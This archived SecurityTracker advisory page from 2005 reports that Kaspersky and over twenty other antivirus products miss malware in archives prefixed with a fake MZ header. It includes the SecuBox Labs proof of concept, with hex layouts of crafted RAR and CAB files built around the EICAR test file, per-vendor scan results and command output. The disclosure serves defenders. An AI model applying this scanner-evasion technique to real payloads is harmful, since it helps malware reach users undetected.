SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   Kaspersky Anti-Virus Vendors:   Kaspersky Lab
Kaspersky Anti-Virus May Fail to Detect Viruses in Modified Archives
SecurityTracker Alert ID:  1015024
SecurityTracker URL:  http://securitytracker.com/id/1015024
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 10 2005
Impact:   Host/resource access via network
Exploit Included:  Yes  

Description:   fRoGGz from SecuBox Labs reported a vulnerability in Kaspersky Anti-Virus. A remote user can create a file containing a virus that will not be detected by the scanning mechanism.

A remote user can create a specially crafted archive that contains a file with malicious code but will not be detected as containing malicious code until the file in the archive is extracted.

An archive that begins with a fake MZ header can trigger the flaw. The archive can be crafted to still appear to be a valid archive to various archive extractors.

A variety of archive formats can be used, including rar, cab, and other formats.

Many other anti-virus products are also affected.

Some demonstration exploit examples are available in the original advisory at:

http://shadock.net/secubox/AVCraftedArchive.html

Impact:   A remote user can create an archive that contains malicious code but will evade the antivirus detection.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.kaspersky.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [SecuBox Labs] Multiple Antivirus detection bypass by special

-=====================================================================-

Release Date : 2005-10-05
Tested on: Windows 2000 SP2 & SP4
Tested with: Jotti Online Antivirus Scanner
Tested with: VirusTotal Online Antivirus Scanner
Tested with: Command line freeware UnRAR v3.50
Tested with: PowerZip v7.06

Affected Products:
* Kaspersky Antivirus
* BitDefender Antivirus
* NOD32 Antivirus
* F-Prot Antivirus
* Avast Antivirus
* McAfee Antivirus
* Sophos Antivirus
* Symantec Antivirus
* Dr.Web Antivirus
* Avira Antivirus
* Norman Virus Control Antivirus
* Fortinet Antivirus
* VBA32 Antivirus
* Rising Antivirus
* AntiVir Antivirus
* eTrust-Iris Antivirus
* ArcaVir Antivirus
* eTrust-Vet Antivirus
* UNA Antivirus
* Ikarus AntiVirus
* ClamAV Antivirus
* Panda Antivirus
* CAT Quick Heal
* TheHacker
[+] May be others.....

Not affected:
* Only Grisoft AVG AntiVirus have found all PoC

Discovered by: fRoGGz
Credit to: SecuBox Labs
Rated as : Medium

-=====================================================================-

Please, read this first.
________________________

Carefull, it's different than CAN-2004-0932 & CAN-2004-0937 !
Security Focus bid: 11448

Different than vulnerabilty reported by Thierry Zoller & discovered by Dr. Peter Bieringer.
Security Focus bid: 12793

[ Why ? ]

[+] Scanning EICAR.zip ... <- (eicar.com is inside)
[-] Writing central header patch [0x00000016]
[-] Writing local header patch [0x0000007F]
[+] File scanning finished. EOF:16 ERR:0

Scanned files

X:\=>Master Boot Record 80 OK
X:\=>Partition Boot 1 (primary) (active) OK
X:\=>Master Boot Record 81 OK
X:\=>Partition Boot 1 (primary) OK
X:\SecuBox.Labs\Debug\EICAR.zip OK
X:\SecuBox.Labs\Debug\EICAR.zip=>EICAR.com Infected EICAR-Test-File (not a virus)
X:\SecuBox.Labs\EICAR.zip=>EICAR.com Deleted
X:\SecuBox.Labs\EICAR.zip Update

Ok ? So ... it's really different.

-=====================================================================-

Analysis
__________

Specially crafted archive containing a virus will pass
through the antivirus system without detection.

An attacker can compress a malicious payload and evade
detection by some anti-virus software.

The bypassed malicious content does not pose a risk until
extracted from the RAR archive file. Malicious content
will be detected and eliminated by your Antivirus.

Contrary to Winzip or BitZipper which do not authorize the
opening of the file, Winrar & PowerZip open & extract it.

Possible formats are:
/------------------------------------------------------------\
*.RAR, *.ZIP, *.CAB, *.ARJ, *.LZH, *.ACE, *.TAR, *.GZ (GZIP)
*.UUE, *.BZ2, *.JAR, *.ISO, *.7Z, *.Z
\------------------------------------------------------------/

Proof of Concept
________________


************ WARNING *****************
We have used: eicar.com
EICAR test is a 68 bytes file "detect" as if it were a virus.
Read more about EICAR
Notes:: For BitZipper & WinZip file is corrupted !
************ WARNING *****************

Compress file "eicar.com" with Winrar: eicar.rar
-=====================================================================-
10h: 00 00 00 00 D3 AD 74 20 90 2E 00 44 00 00 00 44 ; ....ӭt ?..D...D
50h: 58 35 34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 ; X54(P^)7CC)7}$EI
60h: 43 41 52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 ; CAR-STANDARD-ANT
70h: 49 56 49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 ; IVIRUS-TEST-FILE
-=====================================================================-

Malicious archive must start with a fake MZ header.
Of course, we must test for create a valid archive file.

-=====================================================================-
Archive is correct :: No errors found during test operation
-=====================================================================-
UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal
Extracting from SecuBox_AVPoC2.rar
Extracting EICAR.com OK
All OK

UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal
Testing archive SecuBox_AVPoC2.rar
Testing EICAR.com OK
All OK

-=====================================================================-

--------------------
[e_magic][archive] >> Like this >> [4D5A][526172211A0700...]

Results for: SecuBox_AVPoC1.rar
_______________________________

[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[?] Avast Found nothing
[!] AVG Antivirus Found EICAR_Test (+187)
[!] BitDefender Found EICAR-Test-File (not a virus)
[!] CAT-QuickHeal Found Eicar.Test
[~] ClamAV Found nothing >> Suspect
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[!] Fortinet Found EICAR_TEST_FILE
[?] F-Prot Antivirus Found nothing
[!] Ikarus Found EICAR_Test
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Found Eicar.Mod
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[?] VBA32 Found nothing

MD5: e907ab569a6ceed6233e33828032c8f4
SHA1: 071ba79957b80b11b85bb05bdf00f2edb803f4bb

-=====================================================================-

---------------------
[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+52 61 72 21 1A 07 00 CF....

Results for: SecuBox_AVPoC2.rar
________________________________

[?] AntiVir Found nothing
[!] ArcaVir Found Eicar.Test
[!] Avast Found EICAR Test-NOT!!
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[!] CAT-QuickHeal Found Eicar.Test
[~] ClamAV Found nothing >> Suspect
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[!] Ikarus Found EICAR_Test
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Found Eicar.Mod
[!] Sophos EICAR-AV-Test
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[?] VBA32 Found nothing

MD5: 757e6c7984028653c557d5b0bf5374fd
SHA1: 438d119bae0eedca413f27958172523738889c75

-=====================================================================-

---------------------
[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+4D 53 43 46 00 00 00 00....

Compress file "eicar.com" with Winrar: eicar.cab
-=====================================================================-
00h: 4D 53 43 46 00 00 00 00 96 00 00 00 00 00 00 00 ; MSCF....?.......
10h: 2C 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 ; ,...............
20h: 29 00 00 00 46 00 00 00 01 00 01 00 44 00 00 00 ; )...F.......D...
40h: 52 2E 63 6F 6D 00 60 79 2E 6A 48 00 44 00 43 4B ; R.com.`y.jH.D.CK
-=====================================================================-

Results for: SecuBox_AVPoC3.cab
________________________________

[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[?] Avast Found nothing
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[?] CAT-QuickHeal Found nothing
[?] ClamAV Found nothing
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[?] Ikarus Found nothing
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[?] Panda Found nothing
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[!] VBA32 Found EICAR-Test-File

MD5: 621990887beb0cbca7a071d3006a7fdf
SHA1: 3edd5b71eaa803d6cdffc181ceaaf9ad9b85cf31

WARNING: Results are not verifiable at 100%
PoC files were checked via VirusTotal & Jotti Online Antivirus Scanner

-=====================================================================-

[ unix analysis ]

thot:~$ clamscan --no-summary SecuBox_AVPoC3.cab
SecuBox_AVPoC3.cab: OK
thot:~$ cabextract SecuBox_AVPoC3.cab
Extracting cabinet: SecuBox_AVPoC3.cab
extracting EICAR.com
All done, no errors.
thot:~$ clamscan --no-summary EICAR.com
EICAR.com: Eicar-Test-Signature FOUND
thot:~$

thot:~$ clamscan -V
ClamAV 0.87/1120/Fri Oct 7 13:06:49 2005

CREDiTS
---------------------
SecuBox Labs - fRoGGz
Greet's fly out to: Jordi Bosveld & VirusTotal

-=====================================================================-











































-- ___________________________________________________________ 
Sign-up for Ads Free at Mail.com http://promo.mail.com/adsfreejump.htm 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC